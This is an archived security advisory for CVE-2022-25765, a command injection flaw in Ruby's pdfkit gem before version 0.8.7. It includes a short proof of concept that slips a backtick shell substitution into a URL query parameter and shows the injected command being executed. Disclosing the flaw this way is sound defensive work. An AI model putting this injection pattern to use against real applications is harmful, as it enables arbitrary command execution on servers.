⚠️ [ ORIGIN SOURCE ]
https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
📅 [ Archival Date ]
Dec 7, 2022 7:52 PM
🏷️ [ Tags ]
pdfkitruby
✍️ [ Author ]
Benoit Côté-Jodoin
💣 [ PoC / Exploit ]
https://crash.link/cve-2022-25765
INTRODUCED: 14 JUN 2022
CVE-2022-25765
CWE-78
How to fix?Upgrade
pdfkit
to version 0.8.7 or higher.
Overview
Affected versions of this package are vulnerable to Command Injection where the URL is not properly sanitized.
PoC:
An application could be vulnerable if it tries to render a URL that contains query string parameters with user input:
PDFKit.new("http://example.com/?name=#{params[:name]}").to_pdf
If the provided parameter happens to contain a URL encoded character and a shell command substitution string, it will be included in the command that PDFKit executes to render the PDF:
irb(main):060:0> puts PDFKit.new("http://example.com/?name=#{'%20`sleep 5`'}").command wkhtmltopdf --quiet [...] "http://example.com/?name=%20`sleep 5`" - => nil
Calling to_pdf
on the instance shows that the sleep
command is indeed executing:
PDFKit.new("http://example.com/?name=#{'%20`sleep 5`'}").to_pdf
# 5 seconds wait...
Of course, if the user can control completely the first argument of the PDFKit constructor, they can also exploit the command injection as long as it starts with "http":
PDFKit.new("http%20`sleep 5`").to_pdf
References
- GitHub Commit
- GitHub PR
- Vulnerable Code
- Vulnerable Code